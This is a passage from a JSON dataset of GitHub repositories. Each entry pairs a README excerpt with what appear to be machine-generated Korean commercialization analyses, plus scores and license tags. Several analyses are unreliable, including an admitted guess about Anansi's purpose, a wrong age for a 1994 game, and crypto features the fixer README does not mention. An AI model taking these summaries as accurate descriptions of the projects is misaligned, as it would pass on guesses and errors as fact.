있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 개발자 교육 플랫폼으로 운영하여 구독 수익 창출\n- **내부 업무 도구**: 스타트업이나 개발팀의 ","readme_excerpt":"[![Contributors][contributors-shield]][contributors-url]\n[![Forks][forks-shield]][forks-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![license: CC BY-NC-SA 4.0](https://img.shields.io/badge/license-CC%20BY--NC--SA%204.0-lightgrey.svg)][license-url]\n\n<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/wx-chevalier/Web-Notes\">\n    <img src=\"https://ngte-superbed.oss-cn-beijing.aliyuncs.com/item/header.svg\" alt=\"Logo\" style=\"width: 100vw;height: 400px\" />\n  </a>\n\n  <p align=\"center\">\n    <a href=\"https://ng-tech.icu/books/Web-Notes\"><strong>在线阅读 >> </strong></a>\n    <br />\n    <br />\n    <a href=\"https://github.com/wx-chevalier\">代码案例</a>\n    ·\n       <a href=\"https://github.com/wx-chevalier/Awesome-Lists\">参考资料</a>\n\n  </p>\n</p>\n\n<!-- ABOUT THE PROJECT -->\n\n# Web Series | Web 全栈开发、工程架构与性能调优\n\nWeb 开发，入门易，深度难，分为初窥门径、登堂入室、融会贯通等阶段，如果您是首次阅读笔者的系列文章，建议前往[某熊的技术之路指北 ☯](https://github.com/wx-chevalier/Developer-Zero-To-Mastery)以做整体了解。在","composite_score":0.0063,"license_safety_tag":"unknown"},{"name":"paaatrick/playball","github_url":"https://github.com/paaatrick/playball","stars":6,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# playball 저장소 분석\n\n## 왜 보물인가\n스포츠 경기 데이터나 팀 관리를 쉽게 다룰 수 있는 기반 도구로, 스포츠 관련 앱이나 서비스를 만들려는 사람들에게 시간과 비용을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스포츠 경기 관리 웹서비스**: 아마추어 야구·풋볼 리그의 경기 일정, 성적, 순위를 자동으로 정리하고 팬들에게 ","readme_excerpt":"## Playball!\nWatch MLB games from the comfort of your own terminal\n\n![screenshot](./demo.gif)\n\n### Why?\n[MLB Gameday](http://www.mlb.com/mlb/gameday/#) and [MLB.tv](http://mlb.tv) are\ngreat, but sometimes you want to keep an eye on a game a bit more discreetly.\n`playball` puts the game in a terminal window.\n\n### Quick Start\nJust want to try it out?\n```\n$ npx playball\n```\n\n### Install\nReady for the big leagues? Install the package globally\n```\n$ npm install -g playball\n```\nThen run it\n```\n$ playball\n```\n\n### Docker\nDon't have Node.js installed? You can run via Docker instead.\n```\n$ docker run -it --rm paaatrick0/playball\n```\n\n> [!TIP]\n> When running via Docker, times will be shown by default in Eastern Time. To change this, set the `TZ` environment variable to your desired timezone. \n> \n> For Central Time use:\n> ```\n> $ docker run -it --rm -e TZ=America/Chicago paaatrick0/playball\n> ```\n> For Mountain Time use:\n> ```\n> $ docker run -it --rm -e TZ=America/Denver paaatrick0/playball\n> ```","composite_score":0.0063,"license_safety_tag":"safe"},{"name":"open-cluster-management-io/OCM","github_url":"https://github.com/open-cluster-management-io/OCM","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Open Cluster Management (OCM) 프로젝트 분석\n\n## 왜 보물인가\n여러 개의 컴퓨터 시스템을 한곳에서 일괄 관리할 수 있는 플랫폼으로, 대규모 IT 인프라를 운영하는 기업들의 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **하이브리드 클라우드 관리 SaaS**: 클라우드와 자체 서버를 동시에 사용하는 기업","readme_excerpt":"![OCM logo](assets/ocm-logo.png)\n\n[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/5376/badge)](https://bestpractices.coreinfrastructure.org/projects/5376)\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/open-cluster-management-io/ocm/badge)](https://api.securityscorecards.dev/projects/github.com/open-cluster-management-io/ocm)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fopen-cluster-management-io%2Focm.svg?type=shield&issueType=license)](https://app.fossa.com/projects/git%2Bgithub.com%2Fopen-cluster-management-io%2Focm?ref=badge_shield&issueType=license)\n[![Artifact HUB Cluster Manager](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/cluster-manager)](https://artifacthub.io/packages/olm/community-operators/cluster-manager)\n[![Artifact HUB Klusterlet](https://img","composite_score":0.0062,"license_safety_tag":"safe"},{"name":"hakanensari/fixer","github_url":"https://github.com/hakanensari/fixer","stars":5,"language":"Ruby","license":"mit","abandonment_months":0,"description":"# fixer 저장소 분석\n\n## 왜 보물인가\n환율, 암호화폐 가격 같은 금융 데이터를 자동으로 수집하고 관리해주는 도구로, 금융 서비스를 만드는 개발자들의 필수 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 해외송금 서비스**\n개인이 해외로 돈을 보낼 때 실시간 환율을 자동 계산해주는 모바일 앱에 활용 가능합니다.\n\n**2. 자산관리 웹사이트**","readme_excerpt":"# Frankfurter\n\n[Frankfurter](https://frankfurter.dev) is an open-source currency data API that tracks daily exchange rates from institutional sources.\n\n## Deployment\n\nThe public API runs at <https://api.frankfurter.dev>. If you prefer to host your own instance, you can run Frankfurter with Docker.\n\n### Using Docker\n\nThe quickest way to get started:\n\n```bash\ndocker run -d -p 8080:8080 lineofflight/frankfurter\n```\n\nFor production, mount a volume to persist the SQLite database across container restarts and set any optional API keys:\n\n```bash\ndocker run -d -p 8080:8080 \\\n  -e DATABASE_URL=sqlite:///app/data/frankfurter.sqlite3 \\\n  -e BAM_API_KEY=your_key \\\n  -e BANXICO_API_KEY=your_key \\\n  -e BCCH_USER=your_email \\\n  -e BCCH_PASS=your_password \\\n  -e BOT_API_KEY=your_key \\\n  -e FRED_API_KEY=your_key \\\n  -e TCMB_API_KEY=your_key \\\n  -v ./data:/app/data \\\n  --pull always \\\n  lineofflight/frankfurter\n```\n\nWithout a mounted volume, the database is ephemeral and some endpoints may return empty ","composite_score":0.0062,"license_safety_tag":"safe"},{"name":"lennartkoopmann/nzyme","github_url":"https://github.com/lennartkoopmann/nzyme","stars":13,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# Nzyme 저장소 분석\n\n## 왜 보물인가\n무선 네트워크의 보안 위협을 실시간으로 감지하고 분석하는 전문 도구로, 기업의 숨겨진 보안 위험을 찾아낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업을 위한 클라우드 기반 무선 네트워크 보안 모니터링 플랫폼\n- **내부 업무 도구**: 대기업 정보보안팀의 사내 네트워크 위협 탐","readme_excerpt":"# Nzyme - Close Access Denial\n\n[![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/)\n[![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license)\n\nLearn more at https://www.nzyme.org/.\n\n**Version 2.0.0 of Nzyme is currently in development and alpha releases are available.**\n\n## Contributing\n\nThere are many ways to contribute and all community interaction is absolutely welcome:\n\n* Open an issue for any kind of bug you think you have found.\n* Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug.\n* Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged.\n* Write documentation.\n* Write a blog post.\n* Help a user in the issue tracker or [our Discord](https://discord.gg/9W2tVtXUny).\n* Get in","composite_score":0.0062,"license_safety_tag":"unknown"},{"name":"afritz1/OpenTESArena","github_url":"https://github.com/afritz1/OpenTESArena","stars":5,"language":"C++","license":"mit","abandonment_months":0,"description":"# OpenTESArena 프로젝트 분석\n\n## 왜 보물인가\n20년 전 명작 게임의 엔진을 현대적으로 재구성한 오픈소스 프로젝트로, 게임 개발자와 복고 게임 팬들에게 학습 자료와 창작 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 플랫폼**: 대학 게임 개발 학과나 온라인 교육 사이트에서 유료 강의 콘텐츠로 활용\n2. **레트","readme_excerpt":"# OpenTESArena\r\n\r\n[![GitHub release](https://img.shields.io/github/release/afritz1/OpenTESArena/all.svg)](https://github.com/afritz1/OpenTESArena/releases/latest)\r\n[![Build Status](https://github.com/afritz1/OpenTESArena/actions/workflows/cmake.yml/badge.svg?branch=main)](https://github.com/afritz1/OpenTESArena/actions)\r\n[![MIT License](https://img.shields.io/badge/license-MIT-green)](LICENSE.txt) \r\n[![Discord](https://img.shields.io/discord/395739926831824908.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/DgHe2jG)\r\n[![YouTube Channel Views](https://img.shields.io/youtube/channel/views/UCJpmkgtHRIxR7aOpi909GKw)](https://www.youtube.com/channel/UCJpmkgtHRIxR7aOpi909GKw)\r\n\r\nThis is an in-progress modern open-source engine for the 1994 DOS game [*The Elder Scrolls: Arena*](https://en.wikipedia.org/wiki/The_Elder_Scrolls:_Arena) by Bethesda Softworks. The goal is to replicate all aspects of the original game with a clean-room approach while mak","composite_score":0.0062,"license_safety_tag":"safe"},{"name":"reactor/BlockHound","github_url":"https://github.com/reactor/BlockHound","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# BlockHound 저장소 분석\n\n## 왜 보물인가\n소프트웨어가 예기치 않게 멈추거나 느려지는 문제를 자동으로 찾아내는 도구로, 개발자들이 품질 좋은 애플리케이션을 만드는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 모니터링 서비스**: 고객사의 웹 애플리케이션이 제대로 작동하는지 자동으로 감시하고 문제 발생 시 알려주는 서비스로 제","readme_excerpt":"# BlockHound\n\n[![](https://img.shields.io/badge/dynamic/xml.svg?label=Release&color=green&query=%2F%2Fmetadata%2Fversioning%2Flatest&url=https%3A%2F%2Frepo1.maven.org%2Fmaven2%2Fio%2Fprojectreactor%2Ftools%2Fblockhound%2Fmaven-metadata.xml)](https://repo1.maven.org/maven2/io/projectreactor/tools/blockhound/)\n[![](https://img.shields.io/badge/dynamic/xml.svg?label=Milestone&color=blue&query=%2F%2Fmetadata%2Fversioning%2Flatest&url=https%3A%2F%2Frepo.spring.io%2Fmilestone%2Fio%2Fprojectreactor%2Ftools%2Fblockhound%2Fmaven-metadata.xml)](https://repo.spring.io/milestone/io/projectreactor/tools/blockhound/)\n[![](https://img.shields.io/badge/dynamic/xml.svg?label=Snapshot&color=orange&query=%2F%2Fmetadata%2Fversioning%2Flatest&url=https%3A%2F%2Frepo.spring.io%2Fsnapshot%2Fio%2Fprojectreactor%2Ftools%2Fblockhound%2Fmaven-metadata.xml)](https://repo.spring.io/snapshot/io/projectreactor/tools/blockhound/)\n[![Gitter](https://badges.gitter.im/reactor/BlockHound.svg)](https://gitter.im/reactor/Bl","composite_score":0.006,"license_safety_tag":"safe"},{"name":"stream-labs/obs-studio-node","github_url":"https://github.com/stream-labs/obs-studio-node","stars":11,"language":"C++","license":"GPL-2.0","abandonment_months":0,"description":"# obs-studio-node 상용화 분석\n\n## 왜 보물인가\n유명한 방송 송출 프로그램(OBS)을 프로그래밍으로 자동 제어할 수 있게 만든 도구로, 대규모 방송 운영 회사들의 업무 자동화 수요를 직접 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **라이브 방송 자동화 SaaS**: 유튜브, 트위치 등에 자동으로 여러 채널에 동시 송출하는 클라우","readme_excerpt":"# libobs via node bindings\nThis library intends to provide bindings to obs-studio's internal library, named libobs accordingly, for the purpose of using it from a node runtime.\nCurrently, only Windows and MacOS are supported.\n\n# Building\n\n## Prerequisites\nYou will need to have the following installed:\n\n* Git\n* [Node.js](https://nodejs.org/en/)\n* [Yarn](https://yarnpkg.com/en/docs/install#windows-stable)\n* [CMake](https://cmake.org/)\n\n### Windows\nBuilding on windows requires additional software:\n\n* [Visual Studio 2019 or 2022](https://visualstudio.microsoft.com/)\n* [Windows SDK](https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk) (may be installed by Visual Studio 2022 Installer)\n\n### Example Build\nWe use a flexible cmake script to be as broad and generic as possible in order to prevent the need to constantly manage the cmake script for custom uses, while also providing sane defaults. It follows a pretty standard cmake layout and you may execute it however you want.\n","composite_score":0.006,"license_safety_tag":"restricted"},{"name":"taybenlor/runno","github_url":"https://github.com/taybenlor/runno","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Runno 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 직접 프로그래밍 코드를 실행하고 결과를 볼 수 있는 도구로, 복잡한 설치 없이 누구나 코딩을 배우고 공유할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 학생들이 웹브라우저만으로 프로그래밍을 배울 수 있는 교육용 SaaS 서비스\n2. **문서 내 코드 실행","readme_excerpt":"👨‍💻 **Use Runno** 👉 [Runno.dev](https://runno.dev/)\n\n📖 **Documentation** 👉 [Runno.dev](https://runno.dev/docs/)\n\n# Runno\n\nRunno is a collection of JavaScript Packages for running code in various languages\ninside a sandbox. It's made of the following packages:\n\n- [`@runno/runtime`](https://github.com/taybenlor/runno/tree/main/packages/runtime) - web components and headless tools for running code examples in the browser.\n- [`@runno/sandbox`](https://github.com/taybenlor/runno/tree/main/packages/sandbox) - a secure sandbox for running code examples in Node and other JS Runtimes.\n- [`@runno/wasi`](https://github.com/taybenlor/runno/tree/main/packages/wasi) - an isomorphic package for running WebAssembly WASI binaries inside a sandbox.\n- [`@runno/mcp`](https://github.com/taybenlor/runno/tree/main/packages/mcp) - an MCP Server for running code using the `@runno/sandbox` package.\n\nThere's also a deprecated Python package called [`runno`](https://github.com/taybenlor/runno/tree/main/sandbox)\nt","composite_score":0.006,"license_safety_tag":"safe"},{"name":"francoismassart/eslint-plugin-tailwindcss","github_url":"https://github.com/francoismassart/eslint-plugin-tailwindcss","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# eslint-plugin-tailwindcss 상품화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 디자인 코드를 정확하게 작성하도록 자동으로 검사해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 개발팀을 위한 코드 품질 검사 플랫폼에 통합하여 자동 검사 기능 제공\n- **내부 업무 도구**: IT팀이 회사 웹사이트 ","readme_excerpt":"# eslint-plugin-tailwindcss\n\n![npm latest version](https://img.shields.io/npm/v/eslint-plugin-tailwindcss?style=for-the-badge) ![license](https://img.shields.io/npm/l/eslint-plugin-tailwindcss?style=for-the-badge) ![downloads](https://img.shields.io/npm/dt/eslint-plugin-tailwindcss?style=for-the-badge)\n\n![eslint-plugin-tailwindcss logo](.github/logo.png)\n\nRules enforcing best practices and consistency using [Tailwind CSS](https://tailwindcss.com/).\n\nWhile you can use the official plugin [`prettier-plugin-tailwindcss`](https://www.npmjs.com/package/prettier-plugin-tailwindcss) for ordering your classnames...\n\n**`eslint-plugin-tailwindcss` offers more than 5 other rules, that you can benefit from on top of `prettier-plugin-tailwindcss`. Sounds good ? Keep reading 👇**\n\n## About Tailwind CSS 4 support\n\nWhile the [development of `eslint-plugin-tailwindcss` for Tailwind CSS v4 is ongoing](https://github.com/francoismassart/eslint-plugin-tailwindcss/tree/alpha/v4), you can use the latest vers","composite_score":0.0059,"license_safety_tag":"safe"},{"name":"ntucker/anansi","github_url":"https://github.com/ntucker/anansi","stars":9,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":1,"description":"# Anansi 저장소 분석\n\n## 왜 보물인가\n별도 설명 정보가 없어 저장소의 핵심 가치를 파악하기 어렵지만, 9개의 스타와 지속적인 유지보수(최근 커밋: 2026-05-08)는 안정적이고 실용적인 도구임을 시사합니다.\n\n## 어디에 쓸 수 있나\n**1. 웹 크롤링 자동화 SaaS**: 뉴스, 부동산, 전자상거래 데이터를 자동으로 수집하는 클라우드 서비스","readme_excerpt":"# 🕷 Anansi\n\n> Production ready, developer friendly. Opinionated yet extensible.\n\n[Anansi](https://en.wikipedia.org/wiki/Anansi) (/əˈnɑːnsi/ ə-NAHN-see) is an Akan folktale character. He often takes the shape of a spider and is considered to be the god of all knowledge of stories. Anansi uses his knowledge to help JavaScript developers spin new web projects.\n\n<div align=\"center\">\n\n[🎮Demo](https://stackblitz.com/github/ntucker/anansi/tree/master/examples/concurrent)\n\n</div>\n\n## Motivation\n\nStarting a new React project can be a lot of work. There are many tools that need to work together. The best tools available keep a tight technical focus with high levels of configurability. In practice this means it's a lot of work to get started and even more work to maintain, while keeping the tools cleanly working together.\n\nLike Ubuntu did for Linux; Anansi focuses on bringing together many powerful tools in unison to build high performance web applications, quickly - while not losing the power an","composite_score":0.0059,"license_safety_tag":"safe"},{"name":"FirmaChain/firma-js","github_url":"https://github.com/FirmaChain/firma-js","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# FirmaChain/firma-js 분석 보고서\n\n## 왜 보물인가\n블록체인 기반 전자서명 솔루션으로, 법적 효력이 있는 디지털 계약 체결을 안전하게 처리할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 계약 플랫폼(예: 부동산 계약, 고용계약 자동화 서비스)으로 기업과 개인이 언제 어디서나 법적 효력이 있","readme_excerpt":"# firma-js\n\n[![npm version](https://badge.fury.io/js/%40firmachain%2Ffirma-js.svg)](https://badge.fury.io/js/%40firmachain%2Ffirma-js)\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/firmachain/firma-js)](https://github.com/firmachain/firma-js/releases)\n[![license](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/firmachain/firma-js/blob/master/LICENSE)\n[![](https://tokei.rs/b1/github/XAMPPRocky/tokei)](https://github.com/FirmaChain/firma-js)\n\n**The Official JavaScript & TypeScript SDK for FirmaChain**\n\nFirma-js is a comprehensive SDK for building applications on the FirmaChain blockchain using JavaScript and TypeScript. Whether you're developing client-side web applications or server-side Node.js applications, this SDK provides seamless integration with FirmaChain's full suite of blockchain capabilities.\n\nBuilt with inspiration from CosmJS and other leading Cosmos SDK implementations, firma-js offers a service-oriented architecture that provide","composite_score":0.0058,"license_safety_tag":"safe"},{"name":"zhanyong-wan/dongbei","github_url":"https://github.com/zhanyong-wan/dongbei","stars":7,"language":"Python","license":"MIT","abandonment_months":0,"description":"# dongbei 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 동북 방언(중국 지역 언어)을 프로그래밍 언어로 만든 창의적인 시도로, 비영어권 사용자들이 자신의 언어로 코딩할 수 있는 가능성을 보여줍니다.\n\n## 어디에 쓸 수 있나\n- **교육용 SaaS**: 중국 동북 지역 학생들을 위한 프로그래밍 학습 플랫폼으로 제공\n- **지역 커뮤니티 도구**: ","readme_excerpt":"# dongbei - 东北方言编程语言\n\ndongbei 语言永久域名：http://dongbei-lang.org/\n\n学编程，就整东北浪！\n\n> Make dongbei Great Again !!!\n\n#### 体格咋地\n\n[![体格咋地](https://api.travis-ci.com/zhanyong-wan/dongbei.svg?branch=master)](https://travis-ci.com/zhanyong-wan/dongbei)\n\n扫码关注原作者微信公众号“老万故事会”：\n\n<img src=\"doc/lwgsh.jpg\" height=\"129\"/>\n\n* [引言](#引言)\n* [系统要求](#系统要求)\n* [安装](#安装)\n* [跑程序](#跑程序)\n* [测试](#测试)\n* [吃了没，老铁](#吃了没老铁)\n* [学习材料](#学习材料)\n* [参与开发](#参与开发)\n* [周边](#周边)\n\n## 引言\n\ndongbei 是啥？它是一门*以东北方言词汇为基本关键字的以人为本的编程语言。*\n\n这玩意儿可是填补了世界方言编程地图上的一大片儿空地啊！\n这么说吧，谁要是看了 dongbei 程序能憋住了不笑，我敬他是纯爷们儿！\n\n那它有啥特点咧？多了去了：\n\n*  简单啊！小学文化程度就行。您能看懂春晚不？能？那就没问题。\n*  好读啊！看着看着包您不由自主地念出声儿来。\n*  开心啊！呃，做人嘛，最重要的是要开心。\n*  开源啊！不但不要钱，而且不要脸 -- 随时随地欢迎东北话高手打脸指正。\n\n总而言之，dongbei 语言具有极高的**娱技比**（娱乐精神-技术含量比例）。\n\ndongbei 编程语言的开发采用了业界领先的 **TDD（TreeNewBee-Driven Development）** 方式。\n具体地说，就是每个功能都是先把文案写好，八字没一撇牛皮就吹起来了，然后根据牛皮写测试案例，最后再实现功能让牛皮不被吹破。\n这样做有两大好处：第一每个功能都是有的放矢，不值得 tree new bee 的功能一概没有。\n第二确保了每个功能都有文案负责吹嘘，开发者绝对不会养在深闺无人识。\n\n自 dongbei 语言发布以来，到哪儿都受到银民群众的热情赞誉，滔滔江水罄竹难书。\n兹摘录评论数则：\n\n*  “陈独秀比","composite_score":0.0058,"license_safety_tag":"safe"},{"name":"OSSIA/score","github_url":"https://github.com/OSSIA/score","stars":7,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# OSSIA/score 사업화 분석\n\n## 왜 보물인가\n음악 작곡과 음향 제작을 전문가처럼 할 수 있게 해주는 무료 도구로, 음악 산업의 진입장벽을 크게 낮출 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 음악 협업 플랫폼으로 원격 작곡팀이 실시간 함께 작업\n2. **내부 업무 도구**: 영화/게임 제작사의 배경음악","readme_excerpt":"<img src=\"https://i.imgur.com/BL6J8Jh.png\" width=\"500\">\n\n[![Financial Contributors on Open Collective](https://opencollective.com/ossia/all/badge.svg?label=financial+contributors)](https://opencollective.com/ossia) [![Discord](https://img.shields.io/discord/928307671579394179.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/8Hzm4UduaS) [![join the chat at https://gitter.im/ossia/score](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ossia/score?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Downloads](https://img.shields.io/badge/dynamic/json?color=success&label=downloads&query=%24.downloads&url=https%3A%2F%2Fossia.io%2Fdownload-stats.json)](https://github.com/ossia/score/releases) [![Version](https://img.shields.io/github/release/ossia/score.svg)](https://github.com/ossia/score/releases) [![OpenHub](https://www.openhub.net/p/score/widgets/project_thin_badge?format=gif)](https://www.openhub.net/p/sc","composite_score":0.0058,"license_safety_tag":"unknown"},{"name":"nickjj/docker-flask-example","github_url":"https://github.com/nickjj/docker-flask-example","stars":15,"language":"Python","license":"MIT","abandonment_months":0,"description":"# nickjj/docker-flask-example 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션을 간단하게 만들 수 있는 실용적인 예제 코드로, 초보자도 따라 하며 배울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 회사 직원만 사용하는 간단한 재고 관리, 시간 기록 시스템 구축\n2. **SaaS 서비스**: 무료","readme_excerpt":"# 🐳 An example Flask + Docker app\n\nYou could use this example app as a base for your new project or as a guide to\nDockerize your existing Flask app.\n\nThe example app is minimal but it wires up a number of things you might use in\na real world Flask app, but at the same time it's not loaded up with a million\npersonal opinions.\n\nFor the Docker bits, everything included is an accumulation of [Docker best\npractices](https://nickjanetakis.com/blog/best-practices-around-production-ready-web-apps-with-docker-compose)\nbased on building and deploying dozens of assorted Dockerized web apps since\nlate 2014.\n\n**This app is using Flask 3.1.3 and Python 3.14.5**. The screenshot shows\n`X.X.X` since they get updated regularly:\n\n[![Screenshot](.github/docs/screenshot.jpg)](https://github.com/nickjj/docker-flask-example/blob/main/.github/docs/screenshot.jpg?raw=true)\n\n## 🧾 Table of contents\n\n- [Tech stack](#tech-stack)\n- [Notable opinions and extensions](#notable-opinions-and-extensions)\n- [Running this ","composite_score":0.0058,"license_safety_tag":"safe"},{"name":"opencomputeproject/Time-Appliance-Project","github_url":"https://github.com/opencomputeproject/Time-Appliance-Project","stars":11,"language":"VHDL","license":"NOASSERTION","abandonment_months":0,"description":"# Time-Appliance-Project 분석\n\n## 왜 보물인가\n전 세계의 금융거래, 통신망, 전력망이 정확한 시간에 의존하는데, 이 프로젝트는 그 시간을 극도로 정밀하게 맞춰주는 오픈소스 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융권 내부 시스템**: 증권거래소, 은행의 고빈도 거래 시스템에 정밀 시간 동기화 솔루션을 제공하는 B2","readme_excerpt":"To save spec as PDF - select text below (including images) -> right click -> Print -> Save as PDF\n# Time Card\n#### Spec revision № 1.0\nTime Card is the heart of the [Open Time Server](http://www.opentimeserver.com) Project.\n\nYou can find the [IEEE publication](https://ieeexplore.ieee.org/document/9918379) for it.\n\nIn addition to the ongoing IEEE PAR ([P3335](https://github.com/ahmadexp/IEEE-3335): Standard for Architecture and Interfaces for Time Card) on this [link](https://standards.ieee.org/ieee/3335/11127/)\n\nThis spec can be accessed using http://www.timecard.com  \n\n![Time Card](images/TimecardV9.png)\n\n## Table of Contents\n1. [General](#General)\n1. [Where can I get one](#Where-can-I-get-one)\n1. [Form Factor](#Form-Factor)\n1. [GNSS](#GNSS)\n   1. [Receiver](#Receiver)\n   1. [Security](#Security)\n1. [Clock](#Clock)\n1. [Bridge](#example)\n   1. [Hardware Implementation](#Hardware-Implementation)\n   1. [Software Implementation](#Software-Implementation)\n1. [Interfaces](#Interfaces)\n   1.","composite_score":0.0057,"license_safety_tag":"unknown"},{"name":"nunomaduro/termwind","github_url":"https://github.com/nunomaduro/termwind","stars":5,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Termwind 상용화 분석\n\n## 왜 보물인가\n터미널(검은 화면) 환경에서 예쁜 디자인의 텍스트와 레이아웃을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 CLI 도구 플랫폼으로 제공하여 구독 수익 창출\n2. **내부 업무 도구**: 기업의 서버 관리, 배포 자동화 등 관리자용 시스템 구축\n3. **","readme_excerpt":"<p align=\"center\">\n    <img width=\"150\" height=\"150\" alt=\"Termwind logo\" src=\"/art/logo.png\"/>\n</p>\n\n<h1 align=\"center\" style=\"border:none !important\">\n    <code>Termwind</code>\n    <br>\n    <br>\n</h1>\n\n<p align=\"center\">\n    <img src=\"https://raw.githubusercontent.com/nunomaduro/tailcli/master/art/example.png\" alt=\"Termwind example\" height=\"300\">\n    <p align=\"center\">\n        <a href=\"https://github.com/nunomaduro/termwind/actions\"><img alt=\"GitHub Workflow Status (master)\" src=\"https://img.shields.io/github/actions/workflow/status/nunomaduro/termwind/tests.yml\"></a>\n        <a href=\"https://packagist.org/packages/nunomaduro/termwind\"><img alt=\"Total Downloads\" src=\"https://img.shields.io/packagist/dt/nunomaduro/termwind\"></a>\n        <a href=\"https://packagist.org/packages/nunomaduro/termwind\"><img alt=\"Latest Version\" src=\"https://img.shields.io/packagist/v/nunomaduro/termwind\"></a>\n        <a href=\"https://packagist.org/packages/nunomaduro/termwind\"><img alt=\"License\" src=\"https:/","composite_score":0.0057,"license_safety_tag":"safe"},{"name":"ericelliott/cuid","github_url":"https://github.com/ericelliott/cuid","stars":9,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# ericelliott/cuid 분석 보고서\n\n## 왜 보물인가\n온라인 서비스에서 사용자나 데이터를 구분할 때 필요한 '고유 번호'를 빠르고 안전하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 소규모 팀 협업 도구(Slack 같은)에서 각 메시지나 파일에 고유 번호를 자동으로 부여하는 기능\n\n**2. 내부 업무 도구","readme_excerpt":"# cuid\n[![Travis-CI](https://travis-ci.org/ericelliott/cuid.svg)](https://travis-ci.org/ericelliott/cuid)\n\nCollision-resistant ids optimized for horizontal scaling and binary search lookup performance.\n\n## Status: Deprecated due to security. Use [Cuid2](https://github.com/paralleldrive/cuid2), instead.\n\n> Note: All monotonically increasing (auto-increment, k-sortable), and timestamp-based ids share the security issues with Cuid. V4 UUIDs and GUIDs are also insecure because it's possible to predict future values of many random algorithms, and many of them are biased, leading to increased probability of collision. Likewise, UUID V6-V8 are also insecure because they leak information which could be used to exploit systems or violate user privacy. Here are some example exploits:\n>\n> * [Unauthorized password reset via guessable ID](https://infosecwriteups.com/bugbounty-how-i-was-able-to-compromise-any-user-account-via-reset-password-functionality-a11bb5f863b3)\n> * [Unauthorized access to pri","composite_score":0.0056,"license_safety_tag":"unknown"},{"name":"sail-sg/envpool","github_url":"https://github.com/sail-sg/envpool","stars":7,"language":"C++","license":"Apache-2.0","abandonment_months":0,"description":"# Envpool 저장소 분석\n\n## 왜 보물인가\nAI 모델을 효율적으로 학습시키기 위해 필요한 대규모 데이터 처리 환경을 빠르게 구축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 서비스 SaaS**: 기업들이 자신의 AI 모델을 빠르게 훈련시킬 수 있는 클라우드 플랫폼으로 제공\n2. **게임사 내부 도구**: 게임 AI 테스트와 ","readme_excerpt":"<div align=\"center\">\n  <a href=\"http://envpool.readthedocs.io\"><img width=\"666px\" height=\"auto\" src=\"https://envpool.readthedocs.io/en/latest/_static/envpool-logo.png\"></a>\n</div>\n\n---\n\n[![PyPI](https://img.shields.io/pypi/v/envpool)](https://pypi.org/project/envpool/) [![Downloads](https://static.pepy.tech/personalized-badge/envpool?period=total&units=international_system&left_color=grey&right_color=orange&left_text=PyPI%20Download)](https://pepy.tech/project/envpool) [![arXiv](https://img.shields.io/badge/arXiv-2206.10558-b31b1b.svg)](https://arxiv.org/abs/2206.10558) [![Read the 